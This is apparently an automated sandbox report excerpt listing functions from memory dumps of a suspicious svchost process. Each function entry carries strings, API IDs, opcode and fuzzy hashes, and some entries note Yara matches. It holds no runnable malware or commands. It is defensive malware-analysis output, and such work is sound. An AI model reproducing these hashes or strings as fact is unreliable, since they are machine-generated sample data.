                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                              • API String ID: 0-931879808
                                                                                                              • Opcode ID: 30922ffd0525cea95bb7e204c18a04a983f400ef9316db6194172e7c37afc125
                                                                                                              • Instruction ID: 5080b07e244e0fd158ec76b14303600c494b7adaabfcecfbefb0795c265c0308
                                                                                                              • Opcode Fuzzy Hash: 30922ffd0525cea95bb7e204c18a04a983f400ef9316db6194172e7c37afc125
                                                                                                              • Instruction Fuzzy Hash: 2C310476A10600ABDB20DB5CC945F7AB6ACEB5675CF0800F9E505EB191E774AD0487A0
                                                                                                              Function 03B71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03B7127B
                                                                                                              • BuildLabEx, xrefs: 03B7130F
                                                                                                              • @, xrefs: 03B712A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                              • API String ID: 0-3051831665
                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                              • Instruction ID: eb3e376d2c6eb8852b8cce7702a29e5a94f993ea2d18d6ae1c4790ed07303f7b
                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                              • Instruction Fuzzy Hash: 7C31A47690061CBFDB11DF99CC44EAEBBBDEB44718F0044B5E924AB260D730DA059B60
                                                                                                              Function 03BB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 03BB20F3
                                                                                                              • LdrpInitializationFailure, xrefs: 03BB20FA
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03BB2104
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: 6f322993dd413d288fbefb9342958d3258a127443fb0be8962823bb9541faf81
                                                                                                              • Instruction ID: 163ecbe19c04de06dd81fdb19bafd7ae9c8d3909e153bb53049fe0dd12ba2c9e
                                                                                                              • Opcode Fuzzy Hash: 6f322993dd413d288fbefb9342958d3258a127443fb0be8962823bb9541faf81
                                                                                                              • Instruction Fuzzy Hash: 4FF0FF35750308ABDA20EA4CCC02FAA7768EB40A4CF5408F5F600AF685D6E0A9108A80
                                                                                                              Function 03B403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: 08700ee4989b09f1b0a7d8b37d85f4fb9e96c7e3bdc1302ec989369ec898ce1a
                                                                                                              • Instruction ID: 943cb3373c5acd5ccf990d6b41878a5ba9d1f914f421e399e1fd20000af5c32a
                                                                                                              • Opcode Fuzzy Hash: 08700ee4989b09f1b0a7d8b37d85f4fb9e96c7e3bdc1302ec989369ec898ce1a
                                                                                                              • Instruction Fuzzy Hash: 23715B75A002099FDB01DFA9C990BAEB7F8EF48308F1840B5E905EB251EB34ED01CB65
                                                                                                              Function 03BD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: kLsE
                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                              • Opcode ID: 85bfd7cffb77f9b8773a7e3775d73b4a8853f29dfca4916100b3e52d059ca003
                                                                                                              • Instruction ID: aa435c13544f4dd342aa90d1d29ef810a5866b6dcc22e0611e93b8e9a2634745
                                                                                                              • Opcode Fuzzy Hash: 85bfd7cffb77f9b8773a7e3775d73b4a8853f29dfca4916100b3e52d059ca003
                                                                                                              • Instruction Fuzzy Hash: E34144365213514BD331FF65E846BA97B94EB10B2CF1802B9ED60CE0C9DFB04895C7A0
                                                                                                              Function 03B452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@
                                                                                                              • API String ID: 0-149943524
                                                                                                              • Opcode ID: 0c4c00afa68be1b0d9220678f85666b7ae91bc19dae6adc3534ae0a826fda1d9
                                                                                                              • Instruction ID: 1ea74bf3641a8d55ad07c6ca3e88bae3041bb1f2b8af0ccd56bc5e160587e936
                                                                                                              • Opcode Fuzzy Hash: 0c4c00afa68be1b0d9220678f85666b7ae91bc19dae6adc3534ae0a826fda1d9
                                                                                                              • Instruction Fuzzy Hash: 0B32A9745087118BDB34CF18C580B3AB7E5EF8A658F1849BFF8969B290E734D840EB56
                                                                                                              Function 03B32FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @4_w@4_w$PATH
                                                                                                              • API String ID: 0-1852745621
                                                                                                              • Opcode ID: 6ea759190fc7d08b2fdc879005befdcf2878a0c11076114cf992924458e22f3b
                                                                                                              • Instruction ID: 2528c44260f8f9877cd71affb0f3d7242ed88d6465619835841adcfafc559053
                                                                                                              • Opcode Fuzzy Hash: 6ea759190fc7d08b2fdc879005befdcf2878a0c11076114cf992924458e22f3b
                                                                                                              • Instruction Fuzzy Hash: 31F1CF79E102289BCB25DF99D881ABEB7F1FF49308F4840B9E448EB250DB749D51CB61
                                                                                                              Function 03BFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: 3616ac15daf6d512e4e5520b008fbfca145e6cd6406f6140b161fa2eb5941ccb
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: 4FC19C312043429FDB28CE28C841B6BFBE5EF84358F085ABDF6998A290D775D509CF51
                                                                                                              Function 03B30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ResIdCount less than 2., xrefs: 03B8EEC9
                                                                                                              • Failed to retrieve service checksum., xrefs: 03B8EE56
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                              • API String ID: 0-863616075
                                                                                                              • Opcode ID: dd78b60e6a85f38478857317b603ae0aabb252564353eb08f25b58aa02f12179
                                                                                                              • Instruction ID: 1355bc9086ab44b91084e27011754c63453f0d34cebf1f059477db7738737747
                                                                                                              • Opcode Fuzzy Hash: dd78b60e6a85f38478857317b603ae0aabb252564353eb08f25b58aa02f12179
                                                                                                              • Instruction Fuzzy Hash: 68E1F4B19087849FE364DF15C440BABFBE4FF88319F408A6EE5998B240DB709909CF56
                                                                                                              Function 00401240 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: gfff$S
                                                                                                              • API String ID: 0-689075547
                                                                                                              • Opcode ID: c3be6647dbe6cc5b98a41977876f3875923a8e71468d33625275d7a6889461c2
                                                                                                              • Instruction ID: e431341b1d67e5fc745451f7cae9a32b470161ff68f2d1691612299d1a3635dd
                                                                                                              • Opcode Fuzzy Hash: c3be6647dbe6cc5b98a41977876f3875923a8e71468d33625275d7a6889461c2
                                                                                                              • Instruction Fuzzy Hash: 4CA19371E0020987DB18CE59D8501AEB772EFE5314F24C27FED19AF3D1EA799A428781
                                                                                                              Function 00402920 Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: -{$GR
                                                                                                              • API String ID: 0-1179925523
                                                                                                              • Opcode ID: c28e6b91f78691b83621c0917eed8092120be16c549680ff0f9db2d47e1dffa7
                                                                                                              • Instruction ID: b4af3b5a2527905aa5cfc9c12879170275a79e91ba89fd07e7117125551f8536
                                                                                                              • Opcode Fuzzy Hash: c28e6b91f78691b83621c0917eed8092120be16c549680ff0f9db2d47e1dffa7
                                                                                                              • Instruction Fuzzy Hash: 2471A571B0010647DF1C8E5DCA997ABB3A6EBD0305F58817ED915EF3C1EAB8AD018B84
                                                                                                              Function 00402610 Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: VUUU$gfff
                                                                                                              • API String ID: 0-2662692612
                                                                                                              • Opcode ID: e6091576cf2b6853807572404755113bc5257c93a9f10ac193f78d38ea392fe3
                                                                                                              • Instruction ID: 372af4782d85180f0ac481e82ad683a52dac59266f5275330bb9ee29e341387e
                                                                                                              • Opcode Fuzzy Hash: e6091576cf2b6853807572404755113bc5257c93a9f10ac193f78d38ea392fe3
                                                                                                              • Instruction Fuzzy Hash: 9261D532F005154BCB18CE1DDE882AA7396EBE4314B198277ED19EF3D1F679ED118688
                                                                                                              Function 00402410 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: yxxx$d
                                                                                                              • API String ID: 0-2460085974
                                                                                                              • Opcode ID: 7b8648167894fd504ae106b677104afd9fe5a4e5636c8df2b889ad4b251fb21b
                                                                                                              • Instruction ID: fe4610766710c822c2f3eeb380541be288c4c95b30ca9b44ea1c2b8861269200
                                                                                                              • Opcode Fuzzy Hash: 7b8648167894fd504ae106b677104afd9fe5a4e5636c8df2b889ad4b251fb21b
                                                                                                              • Instruction Fuzzy Hash: D6514962B0010A17DF2C881D9EA83A67642E7E9305F588137E985EF3C5F8B8ED52538D
                                                                                                              Function 03BAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: 8841aa89c32bb0b39ff92fdea57c825588ce7605d8973b7792a876506696efea
                                                                                                              • Instruction ID: 07567737c6c5fd72454cf39970078d5b25f6821cbff1bdb766a4bb9fdc643950
                                                                                                              • Opcode Fuzzy Hash: 8841aa89c32bb0b39ff92fdea57c825588ce7605d8973b7792a876506696efea
                                                                                                              • Instruction Fuzzy Hash: 40612A72E04B189FDB24DFAC8980BADBBB9FB44708F5440B9E559EB291D731E940CB50
                                                                                                              Function 03B4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$
                                                                                                              • API String ID: 0-233714265
                                                                                                              • Opcode ID: cfcf603bcb85503cae91aa92c671f9b2a00b6dc998bac5316ae8b64683623fad
                                                                                                              • Instruction ID: 96f2808286185dc0e591109a77210bbf6443484648611dcd58ac15583c5c7251
                                                                                                              • Opcode Fuzzy Hash: cfcf603bcb85503cae91aa92c671f9b2a00b6dc998bac5316ae8b64683623fad
                                                                                                              • Instruction Fuzzy Hash: 3561A775A0074ADFDB20EFA4C580BADB7B1FF48308F0840B9D515AF680DB74A945EB98
                                                                                                              Function 03B3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 03B3A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 03B3A309
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: 3b126635d626224d26a92d8794dbbd3d443416db3ae10b3bd03eb966366be2f1
                                                                                                              • Instruction ID: ff99742d3ac86142afc262268e44da37a86b1e225982b754b357f928a4b7adce
                                                                                                              • Opcode Fuzzy Hash: 3b126635d626224d26a92d8794dbbd3d443416db3ae10b3bd03eb966366be2f1
                                                                                                              • Instruction Fuzzy Hash: 61419F35A04659EBDB11CF69C880B69B7F4EF46708F2844F6DC44DF291E675DA00CB51
                                                                                                              Function 03B6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local\$@
                                                                                                              • API String ID: 0-380025441
                                                                                                              • Opcode ID: a9a2816890ea4977d7cddee42d80b3df3bb8ba48fd2d387302e1e60f84213539
                                                                                                              • Instruction ID: 996527695c1ff0759bca7b177b8c68a1916087b9a8cfdee588d2258c51fcacca
                                                                                                              • Opcode Fuzzy Hash: a9a2816890ea4977d7cddee42d80b3df3bb8ba48fd2d387302e1e60f84213539
                                                                                                              • Instruction Fuzzy Hash: F93195795087049FC711DF28C980A5BBBE8FBC5658F4809BEF59987261DA34DE04CB92
                                                                                                              Function 03B3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: c96549afd1db69b6715b7e0ce0a2cd1e5810eab78db865eb5a7c984bb3599905
                                                                                                              • Instruction ID: 42e6ccab40a57697d3b9722dc66085b597700435a3d2120abb0c35031aa73cbb
                                                                                                              • Opcode Fuzzy Hash: c96549afd1db69b6715b7e0ce0a2cd1e5810eab78db865eb5a7c984bb3599905
                                                                                                              • Instruction Fuzzy Hash: 2D823C75E002289BDB24CFA9C880BEDFBB5FF4A718F1881B9D859AB254D7309D45CB50
                                                                                                              Function 03B82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P`MwRbMw
                                                                                                              • API String ID: 0-3798419607
                                                                                                              • Opcode ID: 298252000b05bf2aaeee3e5ba406877bda35cda8b6bd74c16a326149ec961091
                                                                                                              • Instruction ID: 51f16b1b2f46c516c87773c830fcf34ea3a59932e6a9248c8d672b7e9158da7d
                                                                                                              • Opcode Fuzzy Hash: 298252000b05bf2aaeee3e5ba406877bda35cda8b6bd74c16a326149ec961091
                                                                                                              • Instruction Fuzzy Hash: E542B27DD0425AAADF25FF68D4446BDBBF5EB04B18F1C80FAD449AB280D6748A81CB50
                                                                                                              Function 03B5FB80 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-3634609715
                                                                                                              • Opcode ID: 46df45692b4a35de820baf3b244e72adbbe8f9f419f05b76e531929360d6566f
                                                                                                              • Instruction ID: 5ebe912b648d2826258859c3af82a74fe34c336735eba5fb876b497c0c52922b
                                                                                                              • Opcode Fuzzy Hash: 46df45692b4a35de820baf3b244e72adbbe8f9f419f05b76e531929360d6566f
                                                                                                              • Instruction Fuzzy Hash: 9122A175904A09EFDB10EFA8C880BAEB7B5FF44318F1485F9E9149B245E734DA45CB90
                                                                                                              Function 03B37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d99a42c6d433139e446857e9432f4bb485f7dfce12d2938599164cc4a4944f9
                                                                                                              • Instruction ID: f677a7bf378cf0b30f8b52fe7628fb97b1457e4ab9997fffea04efd1b3f427e9
                                                                                                              • Opcode Fuzzy Hash: 5d99a42c6d433139e446857e9432f4bb485f7dfce12d2938599164cc4a4944f9
                                                                                                              • Instruction Fuzzy Hash: 42A17FB5608342CFD724DF28C481A2ABBE5FF89308F1549BEE5859B350DB30E945CB92
                                                                                                              Function 03B52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: 4593bd85b03c3410bcddbcb94bbf03349bd59b596dd24b9baac6d99abe429533
                                                                                                              • Instruction ID: 04552f2be2627154490925ccf4fd96512044911b3e05e03cd0483635618f5b63
                                                                                                              • Opcode Fuzzy Hash: 4593bd85b03c3410bcddbcb94bbf03349bd59b596dd24b9baac6d99abe429533
                                                                                                              • Instruction Fuzzy Hash: 95F19C796087458FDB25CF24D480B6ABBE5EF88698F0948FDFC898B340DB34D9458B52
                                                                                                              Function 0041662E Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (
                                                                                                              • API String ID: 0-3887548279
                                                                                                              • Opcode ID: c217bd2924112b173e824f98b99a3d3d24cac39527f22586202aeaea366654b5
                                                                                                              • Instruction ID: e1d45cba25847a78584b8ed2e245d1429f14211f0b9601023fd0c8de57a8ac6a
                                                                                                              • Opcode Fuzzy Hash: c217bd2924112b173e824f98b99a3d3d24cac39527f22586202aeaea366654b5
                                                                                                              • Instruction Fuzzy Hash: 3E021EB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                              Function 00416633 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (
                                                                                                              • API String ID: 0-3887548279
                                                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                              • Instruction ID: 1ff3bfd068e33b094ef255dd7f9f64627ff6a05826e1762857442f3e84bffab2
                                                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                              • Instruction Fuzzy Hash: 32021EB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                              Function 03B5FDC0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-3634609715
                                                                                                              • Opcode ID: cd5c7bbd5c6721f57d07327796bf68d8494acfa16aaf20d241d669854779f979
                                                                                                              • Instruction ID: 04ce80adc28098733e3804325a88062df56318463d7cad6537408efbe5568bd0
                                                                                                              • Opcode Fuzzy Hash: cd5c7bbd5c6721f57d07327796bf68d8494acfa16aaf20d241d669854779f979
                                                                                                              • Instruction Fuzzy Hash: BAF16E74904A09DFDB14EFA8C980BAEB7B5EF48308F1885F9E815DB245E7349A45CB90
                                                                                                              Function 03B6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 14570235aba11f82a2d2acca454e8387452dc8e55192f2d70bb0868f549a0a73
                                                                                                              • Instruction ID: 1cc657d0eed6576eb4563f41afa170b0a110ad0656f6a0c525d5a8a7a2dedcb4
                                                                                                              • Opcode Fuzzy Hash: 14570235aba11f82a2d2acca454e8387452dc8e55192f2d70bb0868f549a0a73
                                                                                                              • Instruction Fuzzy Hash: C0414AB9900288AFDB20DFA9D880AADFBF4FB48304F5441AED859E7216D7349900CB60
                                                                                                              Function 03B30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 7192d521029daac14b2a17e710abb15f4246902d028048c84cf771c082d12e60
                                                                                                              • Instruction ID: 6a49edbe3a0b9795931416bd518559a153097ab6e6cd86fff47c0c3569e2f325
                                                                                                              • Opcode Fuzzy Hash: 7192d521029daac14b2a17e710abb15f4246902d028048c84cf771c082d12e60
                                                                                                              • Instruction Fuzzy Hash: C9A1DA35E083786ADF24FA298841BFEB7A99F4670CF0840F9ED876B281D674CA44C751
